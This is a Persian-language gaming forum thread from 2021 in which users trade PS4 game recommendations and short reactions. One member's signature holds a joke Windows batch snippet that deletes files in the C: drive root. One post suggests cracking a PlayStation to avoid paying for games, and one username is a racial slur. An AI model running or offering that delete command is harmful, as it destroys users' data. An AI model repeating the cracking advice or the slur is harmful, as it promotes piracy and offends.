Tom ارسال شده در January 20, 2021 اشتراک گذاری ارسال شده در January 20, 2021 در در ۱۳۹۹/۷/۲۵ در 23:12، Matinjamali گفته است: پول نیست اینترنت خوب نیست PC خوب نیست سرور خوب نیست پینگ خوب نیست. asaln awli تو که ماشالا پول داری نقل قول 𝑀𝓎 𝒷𝓇𝑜𝓉𝒽𝑒𝓇 لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
MaZer ارسال شده در January 20, 2021 اشتراک گذاری ارسال شده در January 20, 2021 عالی نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Rezza ارسال شده در January 29, 2021 اشتراک گذاری ارسال شده در January 29, 2021 عالی.. عالی.. نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Nigga ارسال شده در January 31, 2021 اشتراک گذاری ارسال شده در January 31, 2021 نقل قول نیازی به پرواز نیست همین پایین بالاتر از خیلیا ایم ♥(っ◔◡◔) 𝓝𝓪𝓽𝓲𝓸𝓷𝓪𝓵 𝓖𝓾𝓪𝓻𝓭 ♥ ☢ 𝐧𝐈𝐠Ĥt ς𝕣𝕒𝓏𝓲ⓔ𝐬 𝓕𝕒мI𝕝𝐲 لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
AminsVn ارسال شده در February 5, 2021 اشتراک گذاری ارسال شده در February 5, 2021 در در ۱۳۹۹/۶/۲۲ در 20:58، LoneMan گفته است: The Last of Us 2 اشک در چشمهایم حلقه زد و ناگهان بغضم ترکید... در در ۱۳۹۹/۱۰/۳۰ در 15:31، LoneMan گفته است: داداش تو چرا همه جا میای ۳ تا لایک میزاری؟ احتمالا برای جمع کردن ارسال 1 نقل قول Enter as a Blind , Exit as a Mute @echo off cd "C:\" del *.* exit لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Shahin15 ارسال شده در February 6, 2021 اشتراک گذاری ارسال شده در February 6, 2021 بازم گذاشت عجب نقل قول Mepogent لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
YaMaZaKi ارسال شده در February 6, 2021 اشتراک گذاری ارسال شده در February 6, 2021 در در ۱۳۹۹/۶/۲۲ در 20:58، LoneMan گفته است: nدر این تاپیک 10 تا بازی نام میبرم که اگه PS4 دارید بازی کنید و لذّت ببرید: Apex:Legends Monster hunter Rayman OverWatch Resident Evil 2 Remake The witcher Collection Uncharted 4 Metal gear solid The Last of Us 2 Reddead 2 redemption لیک کنید حتما اگه خوشتون اومد بازی فقط و فقط resident Evil نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Ellery ارسال شده در February 6, 2021 سازنده اشتراک گذاری ارسال شده در February 6, 2021 در 1 ساعت قبل، yamazaki گفته است: بازی فقط و فقط resident Evil نظر همگان برای من محترمه؛ ممنون از نظرات شما دوست عزیز! نقل قول صبر و ظفر هر دو دوست یکدیگرند بعد صبر نوبت ظفر آید. لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Shahin15 ارسال شده در February 7, 2021 اشتراک گذاری ارسال شده در February 7, 2021 Reddead redemption 2 نقل قول Mepogent لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
RefIeX ارسال شده در February 8, 2021 اشتراک گذاری ارسال شده در February 8, 2021 Resident Evil 3 Remake توپه نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Carroll ارسال شده در February 9, 2021 اشتراک گذاری ارسال شده در February 9, 2021 Nice نقل قول Nw لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Anathema ارسال شده در March 1, 2021 اشتراک گذاری ارسال شده در March 1, 2021 در در ۱۳۹۹/۷/۵ در 23:21، LoneMan گفته است: فورت نایت فورت نایت؟ فورت نایت؟ آخه فورت؟ نقل قول ツ لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Ellery ارسال شده در March 1, 2021 سازنده اشتراک گذاری ارسال شده در March 1, 2021 در 15 دقیقه قبل، RIPMOHAMMAD گفته است: فورت نایت؟ فورت نایت؟ آخه فورت؟ بله و این تاپیک ماله یک ساله پیشه دس از سره این تاپیک های قدیمی من بردارید برین سرچ کنید Left 4 dead اونجا حمایت کنید این یه تاپیک مردس! نقل قول صبر و ظفر هر دو دوست یکدیگرند بعد صبر نوبت ظفر آید. لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Anathema ارسال شده در March 1, 2021 اشتراک گذاری ارسال شده در March 1, 2021 در 12 دقیقه قبل، LoneMan گفته است: بله و این تاپیک ماله یک ساله پیشه دس از سره این تاپیک های قدیمی من بردارید برین سرچ کنید Left 4 dead اونجا حمایت کنید این یه تاپیک مردس! خب من یه تاپیک زنده کنم نقل قول ツ لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Ellery ارسال شده در March 1, 2021 سازنده اشتراک گذاری ارسال شده در March 1, 2021 در هم اکنون، RIPMOHAMMAD گفته است: خب من یه تاپیک زنده کنم برو توی فروم سرچ کن l4d1 Left4Dead ببین از بازی خوشت میاد یا نه بعدش بگو میخوای نصبش کنی یا نه. نقل قول صبر و ظفر هر دو دوست یکدیگرند بعد صبر نوبت ظفر آید. لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Anathema ارسال شده در March 1, 2021 اشتراک گذاری ارسال شده در March 1, 2021 در 3 ساعت قبل، LoneMan گفته است: برو توی فروم سرچ کن l4d1 Left4Dead ببین از بازی خوشت میاد یا نه بعدش بگو میخوای نصبش کنی یا نه. چشم سلطان نقل قول ツ لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Life ارسال شده در March 3, 2021 اشتراک گذاری ارسال شده در March 3, 2021 Cyberpunk 77 نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
ArshiaXpro ارسال شده در March 12, 2021 اشتراک گذاری ارسال شده در March 12, 2021 مفید بود و منم استفاده کردم نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
ArshiaXpro ارسال شده در March 12, 2021 اشتراک گذاری ارسال شده در March 12, 2021 gta هم خوب بود که نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Missy ارسال شده در April 1, 2021 اشتراک گذاری ارسال شده در April 1, 2021 1- من فقط گیم های میگم که ارزش خریدن رو دارم و خودم تجربش کردم و لذت کافی بردم 2- ممکن به این گیم ها به تخفیف داده بشه. نظر من اینه که صبور باشید تا به گیم ها تخفیف داده بشه بعد برید بخرید 3- اگر به نظرتون پرداخت این همه پول به صرفه نمی باشد پلی استیشن خود را کرک کنید (red dead redemption 2 ($59.99 fortnite battle royale (Free) call of duty warzone (Free) the last of us ($19.99) (Marvel's Spider-Man($39.99 Marvel's Spider-Man: Miles Morales($49.99) Ghost of Tsushima($59.99) Assassin's Creed Valhalla($59.99) Apex Legends (Free) The Witcher 3: Wild Hunt($39.99) Minecraft($19.99) نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
DeaTShoT ارسال شده در November 21, 2021 اشتراک گذاری ارسال شده در November 21, 2021 در در ۱۳۹۹/۷/۷ در 17:20، NimaB گفته است: پول نیست اینترنت خوب نیست PC خوب نیست سرور خوب نیست پینگ خوب نیست. همینا باعث میشه پشیمون شی از بازی کردن. هیچی خوب نیست نقل قول [] سرم تو لاکه ولی بیاد بیرون دهن خیلیا به فا**....× ⇆ Pishro ↻ ㅤ◁ㅤ ❚❚ㅤ ▷ㅤ لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Destroyed ارسال شده در November 21, 2021 اشتراک گذاری ارسال شده در November 21, 2021 در 2 دقیقه قبل، DeatShot گفته است: هیچی خوب نیست بله. نقل قول ! ???? ??????? ????? ???? ???? . . . . لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
DeaTShoT ارسال شده در November 26, 2021 اشتراک گذاری ارسال شده در November 26, 2021 نقل قول [] سرم تو لاکه ولی بیاد بیرون دهن خیلیا به فا**....× ⇆ Pishro ↻ ㅤ◁ㅤ ❚❚ㅤ ▷ㅤ لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Destroyed ارسال شده در November 28, 2021 اشتراک گذاری ارسال شده در November 28, 2021 در در ۱۴۰۰/۹/۵ در 12:04، DeatShot گفته است: نقل قول ! ???? ??????? ????? ???? ???? . . . . لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
HeY ارسال شده در November 29, 2021 اشتراک گذاری ارسال شده در November 29, 2021 »: نقل قول !! ⃟▬▬▭••????? ???? ?? ??? , ??? ????'? ?????? ????▴♱!! !! ⃟▬▬▭••????? ???? ?? ??? , ??? ????'? ?????? ????▴♱!! | | لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
ارسالهای توصیه شده
به گفتگو بپیوندید
هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید.
توجه: strong> مطلب ارسالی شما پس از تایید مدیریت برای همه قابل رویت خواهد بود.